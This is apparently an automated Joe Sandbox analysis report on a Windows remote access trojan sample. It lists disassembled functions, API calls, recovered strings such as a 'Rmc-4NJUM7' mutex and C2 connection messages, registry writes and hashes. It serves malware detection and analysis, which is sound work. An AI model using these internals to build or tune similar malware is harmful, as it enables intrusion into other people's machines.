                              • Instruction Fuzzy Hash: 35B09279118202FFCA051B60DC0887ABEBAABCC381F108D2DB586501B0CA37C451AB26
                              Function 00413FD4 Relevance: 55.1, APIs: 5, Strings: 26, Instructions: 813sleepnetworkCOMMON
                              Download Yara Rule

                              Control-flow Graph

                              • Executed
                              • Not Executed
                              control_flow_graph 447 413fd4-41401f call 401faa call 41aa73 call 401faa call 401d64 call 401e8f call 43a5e7 460 414021-414028 Sleep 447->460 461 41402e-41407c call 401f66 call 401d64 call 401fbd call 41afc3 call 404262 call 401d64 call 40b125 447->461 460->461 476 4140f0-41418a call 401f66 call 401d64 call 401fbd call 41afc3 call 401d64 * 2 call 4085b4 call 4027cb call 401eef call 401eea * 2 call 401d64 call 405422 461->476 477 41407e-4140ed call 401d64 call 4022f8 call 401d64 call 401e8f call 401d64 call 4022f8 call 401d64 call 401e8f call 401d64 call 4022f8 call 401d64 call 401e8f call 404101 461->477 530 41419a-4141a1 476->530 531 41418c-414198 476->531 477->476 532 4141a6-414242 call 40541d call 404cbf call 405ce6 call 4027cb call 401f66 call 41a686 call 401eea * 2 call 401d64 call 401e8f call 401d64 call 401e8f call 413f9a 530->532 531->532 559 414244-41428a WSAGetLastError call 41bc76 call 404c9e call 401f66 call 41a686 call 401eea 532->559 560 41428f-41429d call 4041f1 532->560 583 414b54-414b66 call 4047eb call 4020b4 559->583 565 4142ca-4142d8 call 404915 call 40428c 560->565 566 41429f-4142c5 call 401f66 * 2 call 41a686 560->566 579 4142dd-4142df 565->579 566->583 582 4142e5-414432 call 401d64 * 2 call 404cbf call 405ce6 call 4027cb call 405ce6 call 4027cb call 401f66 call 41a686 call 401eea * 4 call 41a96d call 413683 call 4082dc call 440c51 call 401d64 call 401fbd call 4022f8 call 401e8f * 2 call 41265d 579->582 579->583 647 414434-414441 call 40541d 582->647 648 414446-41446d call 401e8f call 412513 582->648 596 414b68-414b88 call 401d64 call 401e8f call 43a5e7 Sleep 583->596 597 414b8e-414b96 call 401d8c 583->597 596->597 597->476 647->648 654 414474-414ac7 call 403b40 call 40cbf1 call 41adee call 41aec8 call 41ad46 call 401d64 GetTickCount call 41ad46 call 41aca0 call 41ad46 * 2 call 41ac52 call 41aec8 * 5 call 40e679 call 41aec8 call 4027ec call 40275c call 4027cb call 40275c call 4027cb * 3 call 40275c call 4027cb call 405ce6 call 4027cb call 405ce6 call 4027cb call 40275c call 4027cb call 40275c call 4027cb call 40275c call 4027cb call 40275c call 4027cb call 40275c call 4027cb call 40275c call 4027cb call 40275c call 4027cb call 405ce6 call 4027cb * 5 call 40275c call 4027cb call 40275c call 4027cb * 7 call 40275c call 404468 call 401eea * 50 call 401e13 call 401eea * 6 call 401e13 call 4045d5 648->654 655 41446f-414471 648->655 901 414ac9-414ad0 654->901 902 414adb-414ae2 654->902 655->654 901->902 905 414ad2-414ad4 901->905 903 414ae4-414ae9 call 40a767 902->903 904 414aee-414b20 call 405415 call 401f66 * 2 call 41a686 902->904 903->904 916 414b22-414b2e CreateThread 904->916 917 414b34-414b4f call 401eea * 2 call 401e13 904->917 905->902 916->917 917->583
                              APIs
                              • Sleep.KERNEL32(00000000,00000029,004742F8,?,00000000), ref: 00414028
                              • WSAGetLastError.WS2_32 ref: 00414249
                              • Sleep.KERNELBASE(00000000,00000002), ref: 00414B88
                                • Part of subcall function 0041A686: GetLocalTime.KERNEL32(00000000), ref: 0041A6A0
                              Strings
                              Memory Dump Source
                              • Source File: 00000001.00000002.4758718698.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                              • Associated: 00000001.00000002.4758702445.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.4758757369.0000000000457000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.4758779955.0000000000470000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.4758779955.0000000000473000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.4758814845.0000000000476000.00000002.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_1_2_400000_1733490559d59c04cc496d19f458945b96e65fd57801bd9b53502be73c34ff8d8deb93.jbxd
                              Yara matches
                              Similarity
                              • API ID: Sleep$ErrorLastLocalTime
                              • String ID: | $%I64u$5.3.0 Pro$@CG$C:\Users\user\Desktop\1733490559d59c04cc496d19f458945b96e65fd57801bd9b53502be73c34ff8d8deb937e45230.dat-decoded.exe$Connected | $Connecting | $Connection Error: $Connection Error: Unable to create socket$Disconnected$Exe$Rmc-4NJUM7$TLS Off$TLS On $TUF$XCG$XCG$XCG$`=G$dCG$hlight$name$x~^$>G$>G$BG
                              • API String ID: 524882891-3600714904
                              • Opcode ID: 306e3275ecf728a0cc16654e9991bc6b244861bfc2fed230cbb40395f1280921
                              • Instruction ID: a0bb0b13232d9f5991351636829aab2dda2428bc81dc0b9639db3628de0ead2f
                              • Opcode Fuzzy Hash: 306e3275ecf728a0cc16654e9991bc6b244861bfc2fed230cbb40395f1280921
                              • Instruction Fuzzy Hash: 58524E31A001145ADB18F771DDA6AEE73A59F90708F1041BFB80A771E2EF385E85CA9D
                              Function 0040428C Relevance: 19.4, APIs: 4, Strings: 7, Instructions: 147networkCOMMON
                              Download Yara Rule

                              Control-flow Graph

                              APIs
                              • connect.WS2_32(?,?,?), ref: 004042A5
                              • CreateEventW.KERNEL32(00000000,00000000,00000001,00000000,?,?,?,0040192B), ref: 004043CB
                              • CreateEventW.KERNEL32(00000000,00000000,00000001,00000000,?,?,?,0040192B), ref: 004043D5
                              • WSAGetLastError.WS2_32(?,?,?,0040192B), ref: 004043E7
                                • Part of subcall function 0041A686: GetLocalTime.KERNEL32(00000000), ref: 0041A6A0
                              Strings
                              Memory Dump Source
                              • Source File: 00000001.00000002.4758718698.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                              • Associated: 00000001.00000002.4758702445.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.4758757369.0000000000457000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.4758779955.0000000000470000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.4758779955.0000000000473000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.4758814845.0000000000476000.00000002.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_1_2_400000_1733490559d59c04cc496d19f458945b96e65fd57801bd9b53502be73c34ff8d8deb93.jbxd
                              Yara matches
                              Similarity
                              • API ID: CreateEvent$ErrorLastLocalTimeconnect
                              • String ID: Connection Failed: $Connection Refused$TLS Authentication Failed$TLS Error 1$TLS Error 2$TLS Error 3$TLS Handshake... |
                              • API String ID: 994465650-2151626615
                              • Opcode ID: 0f377626e57d5989f5b80ec65bcbc170c14374621a219e0cafb3a46d672615dd
                              • Instruction ID: b196b808fbc66b1ac8da6b4b51d7f626a0d3d22bc4cde50e21f83cd2c7739b74
                              • Opcode Fuzzy Hash: 0f377626e57d5989f5b80ec65bcbc170c14374621a219e0cafb3a46d672615dd
                              • Instruction Fuzzy Hash: ED4128B1B00202A7CB04B77A8C5B66D7A55AB81368B40007FF901676D3EE7DAD6087DF
                              Function 004047EB Relevance: 18.1, APIs: 12, Instructions: 66synchronizationCOMMON
                              Download Yara Rule

                              Control-flow Graph

                              APIs
                              • WaitForSingleObject.KERNEL32(?,000000FF,?,?,?,00000000,?,00404B8E,?,?,?,00404B26), ref: 004047FD
                              • SetEvent.KERNEL32(?,?,?,?,00000000,?,00404B8E,?,?,?,00404B26), ref: 00404808
                              • CloseHandle.KERNEL32(?,?,?,?,00000000,?,00404B8E,?,?,?,00404B26), ref: 00404811
                              • closesocket.WS2_32(000000FF), ref: 0040481F
                              • WaitForSingleObject.KERNEL32(?,000000FF,?,?,?,00000000,?,00404B8E,?,?,?,00404B26), ref: 00404856
                              • SetEvent.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000,?), ref: 00404867
                              • WaitForSingleObject.KERNEL32(?,000000FF,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 0040486E
                              • SetEvent.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00404880
                              • CloseHandle.KERNELBASE(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00404885
                              • CloseHandle.KERNELBASE(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 0040488A
                              • SetEvent.KERNEL32(?,?,?,?,00000000,?,00404B8E,?,?,?,00404B26), ref: 00404895
                              • CloseHandle.KERNEL32(?,?,?,?,00000000,?,00404B8E,?,?,?,00404B26), ref: 0040489A
                              Memory Dump Source
                              • Source File: 00000001.00000002.4758718698.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                              • Associated: 00000001.00000002.4758702445.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.4758757369.0000000000457000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.4758779955.0000000000470000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.4758779955.0000000000473000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.4758814845.0000000000476000.00000002.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_1_2_400000_1733490559d59c04cc496d19f458945b96e65fd57801bd9b53502be73c34ff8d8deb93.jbxd
                              Yara matches
                              Similarity
                              • API ID: CloseEventHandle$ObjectSingleWait$closesocket
                              • String ID:
                              • API String ID: 3658366068-0
                              • Opcode ID: 5ad18bbf4ae7feaed2857fa056367bca8483678701d03ea676763946d5c1548a
                              • Instruction ID: 5504d0c870acfe65fd0076db90b097e51f0e6d2514c589c74abed5ba37c9c78a
                              • Opcode Fuzzy Hash: 5ad18bbf4ae7feaed2857fa056367bca8483678701d03ea676763946d5c1548a
                              • Instruction Fuzzy Hash: 3C212C71104B149FCB216B26EC45A27BBE1EF40325F104A7EF2E612AF1CB76E851DB48
                              Function 0040C89E Relevance: 17.6, APIs: 1, Strings: 9, Instructions: 139COMMON
                              Download Yara Rule

                              Control-flow Graph

                              • Executed
                              • Not Executed
                              control_flow_graph 1016 40c89e-40c8c3 call 401e52 1019 40c8c9 1016->1019 1020 40c9ed-40ca13 call 401e07 GetLongPathNameW call 403b40 1016->1020 1022 40c8d0-40c8d5 1019->1022 1023 40c9c2-40c9c7 1019->1023 1024 40c905-40c90a 1019->1024 1025 40c9d8 1019->1025 1026 40c9c9-40c9ce call 43ac0f 1019->1026 1027 40c8da-40c8e8 call 41a74b call 401e18 1019->1027 1028 40c8fb-40c900 1019->1028 1029 40c9bb-40c9c0 1019->1029 1030 40c90f-40c916 call 41b15b 1019->1030 1041 40ca18-40ca85 call 403b40 call 40cc37 call 402860 * 2 call 401e13 * 5 1020->1041 1032 40c9dd-40c9e2 call 43ac0f 1022->1032 1023->1032 1024->1032 1025->1032 1038 40c9d3-40c9d6 1026->1038 1050 40c8ed 1027->1050 1028->1032 1029->1032 1042 40c918-40c968 call 403b40 call 43ac0f call 403b40 call 402860 call 401e18 call 401e13 * 2 1030->1042 1043 40c96a-40c9b6 call 403b40 call 43ac0f call 403b40 call 402860 call 401e18 call 401e13 * 2 1030->1043 1044 40c9e3-40c9e8 call 4082d7 1032->1044 1038->1025 1038->1044 1055 40c8f1-40c8f6 call 401e13 1042->1055 1043->1050 1044->1020 1050->1055 1055->1020
                              APIs
                              • GetLongPathNameW.KERNELBASE(00000000,?,00000208), ref: 0040CA04
                              Strings
                              Memory Dump Source
                              • Source File: 00000001.00000002.4758718698.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                              • Associated: 00000001.00000002.4758702445.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.4758757369.0000000000457000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.4758779955.0000000000470000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.4758779955.0000000000473000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.4758814845.0000000000476000.00000002.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_1_2_400000_1733490559d59c04cc496d19f458945b96e65fd57801bd9b53502be73c34ff8d8deb93.jbxd
                              Yara matches
                              Similarity
                              • API ID: LongNamePath
                              • String ID: AppData$ProgramData$ProgramFiles$SystemDrive$Temp$UserProfile$WinDir$\SysWOW64$\system32
                              • API String ID: 82841172-425784914
                              • Opcode ID: b96183e0479dfb7e206373740ca3f2c2a81a4b44f37acafcab42729827570eb6
                              • Instruction ID: 51cedb133b73bca78a9fc1065318242b3d6e678e936cb09da4a185c9a299c852
                              • Opcode Fuzzy Hash: b96183e0479dfb7e206373740ca3f2c2a81a4b44f37acafcab42729827570eb6
                              • Instruction Fuzzy Hash: 39413A721442009BC214FB21DD96DAFB7A4AE90759F10063FB546720E2EE7CAA49C69F
                              Function 0041A463 Relevance: 10.6, APIs: 1, Strings: 5, Instructions: 59COMMON
                              Download Yara Rule

                              Control-flow Graph

                              APIs
                                • Part of subcall function 0041B15B: GetCurrentProcess.KERNEL32(?,?,?,0040C914,WinDir,00000000,00000000), ref: 0041B16C
                                • Part of subcall function 0041B15B: IsWow64Process.KERNEL32(00000000,?,?,0040C914,WinDir,00000000,00000000), ref: 0041B173
                                • Part of subcall function 00412513: RegOpenKeyExA.KERNELBASE(80000001,00000400,00000000,00020019,?), ref: 00412537
                                • Part of subcall function 00412513: RegQueryValueExA.KERNELBASE(?,?,00000000,00000000,?,00000400), ref: 00412554
                                • Part of subcall function 00412513: RegCloseKey.KERNELBASE(?), ref: 0041255F
                              • StrToIntA.SHLWAPI(00000000,0046BC48,?,00000000,00000000,00474358,00000003,Exe,00000000,0000000E,00000000,0046556C,00000003,00000000), ref: 0041A4D9
                              Strings
                              Memory Dump Source
                              • Source File: 00000001.00000002.4758718698.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                              • Associated: 00000001.00000002.4758702445.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.4758757369.0000000000457000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.4758779955.0000000000470000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.4758779955.0000000000473000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.4758814845.0000000000476000.00000002.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_1_2_400000_1733490559d59c04cc496d19f458945b96e65fd57801bd9b53502be73c34ff8d8deb93.jbxd
                              Yara matches
                              Similarity
                              • API ID: Process$CloseCurrentOpenQueryValueWow64
                              • String ID: (32 bit)$ (64 bit)$CurrentBuildNumber$ProductName$SOFTWARE\Microsoft\Windows NT\CurrentVersion
                              • API String ID: 782494840-2070987746
                              • Opcode ID: 86bbcbdce1bcc566ec4c7eb9c3f3f89489dcb65e6470f8cc487b0f9213cf0882
                              • Instruction ID: 19977b185b3bcff34fa520d2ecc4782d624f476aadfe6515b429a208ce335d2f
                              • Opcode Fuzzy Hash: 86bbcbdce1bcc566ec4c7eb9c3f3f89489dcb65e6470f8cc487b0f9213cf0882
                              • Instruction Fuzzy Hash: EF11E9A060020166C704B365DCABDBF765ADB90304F50443FB906E31D2EB6C9E9683EE
                              Function 004126D2 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 37registryCOMMON
                              Download Yara Rule

                              Control-flow Graph

                              • Executed
                              • Not Executed
                              control_flow_graph 1169 4126d2-4126e9 RegCreateKeyA 1170 412722 1169->1170 1171 4126eb-412720 call 4022f8 call 401e8f RegSetValueExA RegCloseKey 1169->1171 1172 412724-412730 call 401eea 1170->1172 1171->1172
                              APIs
                              • RegCreateKeyA.ADVAPI32(80000001,00000000,?), ref: 004126E1
                              • RegSetValueExA.KERNELBASE(?,HgF,00000000,?,00000000,00000000,004742F8,?,?,0040E5FB,00466748,5.3.0 Pro), ref: 00412709
                              • RegCloseKey.KERNELBASE(?,?,?,0040E5FB,00466748,5.3.0 Pro), ref: 00412714
                              Strings
                              Memory Dump Source
                              • Source File: 00000001.00000002.4758718698.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                              • Associated: 00000001.00000002.4758702445.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.4758757369.0000000000457000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.4758779955.0000000000470000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.4758779955.0000000000473000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.4758814845.0000000000476000.00000002.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_1_2_400000_1733490559d59c04cc496d19f458945b96e65fd57801bd9b53502be73c34ff8d8deb93.jbxd
                              Yara matches
                              Similarity
                              • API ID: CloseCreateValue
                              • String ID: HgF$pth_unenc
                              • API String ID: 1818849710-3662775637
                              • Opcode ID: 1bd7bc63bfcb718f8a00b857ba0206b1347799401e36ec3cc1597cb67c32c774
                              • Instruction ID: d7c223529d0a909ac1d5b5cf1be9cbd74eb10d05c00374dbcf2eb8abb0eb8976
                              • Opcode Fuzzy Hash: 1bd7bc63bfcb718f8a00b857ba0206b1347799401e36ec3cc1597cb67c32c774
                              • Instruction Fuzzy Hash: 98F09032040104FBCB019FA0ED55EEF37ACEF04751F108139FD06A61A1EA75DE04EA94
                              Function 004127D5 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 31registryCOMMON
                              Download Yara Rule

                              Control-flow Graph

                              • Executed
                              • Not Executed
                              control_flow_graph 1196 4127d5-4127eb RegCreateKeyA 1197 412818-41281b 1196->1197 1198 4127ed-412812 RegSetValueExA RegCloseKey 1196->1198 1198->1197 1199 412814-412817 1198->1199
                              APIs
                              • RegCreateKeyA.ADVAPI32(80000001,00000000,TUF), ref: 004127E3
                              • RegSetValueExA.KERNELBASE(TUF,000000AF,00000000,00000004,00000001,00000004,?,?,?,0040B94C,004660E0,00000001,000000AF,00465554), ref: 004127FE
                              • RegCloseKey.KERNELBASE(?,?,?,?,0040B94C,004660E0,00000001,000000AF,00465554), ref: 00412809
                              Strings
                              Memory Dump Source
                              • Source File: 00000001.00000002.4758718698.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                              • Associated: 00000001.00000002.4758702445.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.4758757369.0000000000457000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.4758779955.0000000000470000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.4758779955.0000000000473000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.4758814845.0000000000476000.00000002.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_1_2_400000_1733490559d59c04cc496d19f458945b96e65fd57801bd9b53502be73c34ff8d8deb93.jbxd
                              Yara matches
                              Similarity
                              • API ID: CloseCreateValue
                              • String ID: TUF
                              • API String ID: 1818849710-3431404234
                              • Opcode ID: 386e33d00f3fb5cef405d4ff1ae12e7e359dce24562d3d83ccac8fce873b9f24
                              • Instruction ID: 4d8f19d4f5fba69279ea975c705bdc3302fb28fe13ea63ccb444db4f968143a5
                              • Opcode Fuzzy Hash: 386e33d00f3fb5cef405d4ff1ae12e7e359dce24562d3d83ccac8fce873b9f24
                              • Instruction Fuzzy Hash: 8DE03071540204BFEF115B909C05FDB3BA8EB05B95F004161FA05F6191D271CE14D7A4
                              Function 0040BED7 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 13synchronizationCOMMON
                              Download Yara Rule

                              Control-flow Graph

                              • Executed
                              • Not Executed
                              control_flow_graph 1200 40bed7-40bf03 call 401e8f CreateMutexA GetLastError
                              APIs
                              • CreateMutexA.KERNELBASE(00000000,00000001,00000000,0040D9AA,0000000D,00000033,00000000,00000032,00000000,Exe,00000000,0000000E,00000000,0046556C,00000003,00000000), ref: 0040BEE6
                              • GetLastError.KERNEL32 ref: 0040BEF1
                              Strings
                              Memory Dump Source
                              • Source File: 00000001.00000002.4758718698.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                              • Associated: 00000001.00000002.4758702445.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.4758757369.0000000000457000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.4758779955.0000000000470000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.4758779955.0000000000473000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.4758814845.0000000000476000.00000002.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_1_2_400000_1733490559d59c04cc496d19f458945b96e65fd57801bd9b53502be73c34ff8d8deb93.jbxd
                              Yara matches
                              Similarity
                              • API ID: CreateErrorLastMutex
                              • String ID: Rmc-4NJUM7
                              • API String ID: 1925916568-416662562
                              • Opcode ID: defc0333e3605ddb085507e8cb5f1de2847b42d11ba618549d06c615cf8541f0
                              • Instruction ID: f970ec9d0541ab61c93bafde2a4f59c5c821b48a7874ab2150ad5935bc14b509
                              • Opcode Fuzzy Hash: defc0333e3605ddb085507e8cb5f1de2847b42d11ba618549d06c615cf8541f0
                              • Instruction Fuzzy Hash: 75D012707083009BD7181774BC8A77D3555E784703F00417AB90FD55E1CB6888409919
                              Function 00412513 Relevance: 4.5, APIs: 3, Instructions: 42registryCOMMON
                              Download Yara Rule

                              Control-flow Graph

                              • Executed
                              • Not Executed
                              control_flow_graph 1203 412513-41253f RegOpenKeyExA 1204 412541-412567 RegQueryValueExA RegCloseKey 1203->1204 1205 412572 1203->1205 1204->1205 1206 412569-412570 1204->1206 1207 412577-412583 call 401f66 1205->1207 1206->1207
                              APIs
                              • RegOpenKeyExA.KERNELBASE(80000001,00000400,00000000,00020019,?), ref: 00412537
                              • RegQueryValueExA.KERNELBASE(?,?,00000000,00000000,?,00000400), ref: 00412554
                              • RegCloseKey.KERNELBASE(?), ref: 0041255F
                              Memory Dump Source
                              • Source File: 00000001.00000002.4758718698.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                              • Associated: 00000001.00000002.4758702445.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.4758757369.0000000000457000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.4758779955.0000000000470000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.4758779955.0000000000473000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.4758814845.0000000000476000.00000002.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_1_2_400000_1733490559d59c04cc496d19f458945b96e65fd57801bd9b53502be73c34ff8d8deb93.jbxd
                              Yara matches
                              Similarity
                              • API ID: CloseOpenQueryValue
                              • String ID:
                              • API String ID: 3677997916-0
                              • Opcode ID: 1a25bcfb25f4c61a33ed6ceb80866840e5ee7adcdacacd2e2e41860cf5e9bac8
                              • Instruction ID: 155fce86b91483c744b9f02885d56de91ccd1cdd8f33956e2d71fd22bd1c87ae
                              • Opcode Fuzzy Hash: 1a25bcfb25f4c61a33ed6ceb80866840e5ee7adcdacacd2e2e41860cf5e9bac8
                              • Instruction Fuzzy Hash: F0F08176900118BBCB209BA1ED48DEF7FBDEB44751F004066BA06E2150D6749E55DBA8
                              Function 004124B7 Relevance: 4.5, APIs: 3, Instructions: 38registryCOMMON
                              Download Yara Rule

                              Control-flow Graph

                              • Executed
                              • Not Executed
                              control_flow_graph 1210 4124b7-4124df RegOpenKeyExA 1211 4124e1-412509 RegQueryValueExA RegCloseKey 1210->1211 1212 41250f-412512 1210->1212 1211->1212 1213 41250b-41250e 1211->1213
                              APIs
                              • RegOpenKeyExA.KERNELBASE(80000001,00000000,00000000,00020019,?), ref: 004124D7
                              • RegQueryValueExA.KERNELBASE(?,?,00000000,00000000,00000000,?,004742F8), ref: 004124F5
                              • RegCloseKey.KERNELBASE(?), ref: 00412500
                              Memory Dump Source
                              • Source File: 00000001.00000002.4758718698.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                              • Associated: 00000001.00000002.4758702445.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.4758757369.0000000000457000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.4758779955.0000000000470000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.4758779955.0000000000473000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.4758814845.0000000000476000.00000002.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_1_2_400000_1733490559d59c04cc496d19f458945b96e65fd57801bd9b53502be73c34ff8d8deb93.jbxd
                              Yara matches
                              Similarity
                              • API ID: CloseOpenQueryValue
                              • String ID:
                              • API String ID: 3677997916-0
                              • Opcode ID: 9045fb9a7a6208df116313aaf282ceb7280aaf27367a6f7e2add9e4d3bf57581
                              • Instruction ID: 3c8b5742b91bab9b7a0bfd6479237677f271592d1db5ef4b45a1d16c6b8d7bbd
                              • Opcode Fuzzy Hash: 9045fb9a7a6208df116313aaf282ceb7280aaf27367a6f7e2add9e4d3bf57581
                              • Instruction Fuzzy Hash: C0F03A76900208BFDF119FA0AC45FDF7BB9EB04B55F1040A1FA05F6291D670DA54EB98
                              Function 0044E1BE Relevance: 4.5, APIs: 3, Instructions: 37COMMON
                              Download Yara Rule

                              Control-flow Graph

                              • Executed
                              • Not Executed
                              control_flow_graph 1214 44e1be-44e1cc GetEnvironmentStringsW 1215 44e1d2-44e1e1 call 44e104 call 446aff 1214->1215 1216 44e1ce-44e1d0 1214->1216 1221 44e1e6-44e1ec 1215->1221 1217 44e209-44e20d 1216->1217 1222 44e1ee-44e1f6 call 435ad0 1221->1222 1223 44e1f9-44e208 call 446ac5 FreeEnvironmentStringsW 1221->1223 1222->1223 1223->1217
                              APIs
                              • GetEnvironmentStringsW.KERNEL32 ref: 0044E1C2
                              • _free.LIBCMT ref: 0044E1FB
                              • FreeEnvironmentStringsW.KERNEL32(00000000), ref: 0044E202
                              Memory Dump Source
                              • Source File: 00000001.00000002.4758718698.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                              • Associated: 00000001.00000002.4758702445.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.4758757369.0000000000457000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.4758779955.0000000000470000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.4758779955.0000000000473000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.4758814845.0000000000476000.00000002.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_1_2_400000_1733490559d59c04cc496d19f458945b96e65fd57801bd9b53502be73c34ff8d8deb93.jbxd
                              Yara matches
                              Similarity
                              • API ID: EnvironmentStrings$Free_free
                              • String ID:
                              • API String ID: 2716640707-0
                              • Opcode ID: 0a295fd81f114cc829d5603ea341637f7dd9d1fa50949ca94c47d92f7d778ec6
                              • Instruction ID: bde093253d31ff8e435db0bb20b1dc60884eb56c9c20eb6ac573b4202a4b54cd
                              • Opcode Fuzzy Hash: 0a295fd81f114cc829d5603ea341637f7dd9d1fa50949ca94c47d92f7d778ec6
                              • Instruction Fuzzy Hash: B8E0653714492126F211362B7C89D6F2A1DEFC2775B26013AF50596243EE688D0641EA
                              Function 0041246E Relevance: 4.5, APIs: 3, Instructions: 32registryCOMMON
                              Download Yara Rule
                              APIs
                              • RegOpenKeyExA.KERNELBASE(80000001,00000000,00000000,00020019,?,00000000,?,?,0040B996,004660E0), ref: 00412485
                              • RegQueryValueExA.KERNELBASE(?,?,00000000,00000000,00000000,00000000,?,?,0040B996,004660E0), ref: 00412499
                              • RegCloseKey.KERNELBASE(?,?,?,0040B996,004660E0), ref: 004124A4
                              Memory Dump Source
                              • Source File: 00000001.00000002.4758718698.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                              • Associated: 00000001.00000002.4758702445.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.4758757369.0000000000457000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.4758779955.0000000000470000.00000004.00000001.01000000.00000003.sdmpDownload File
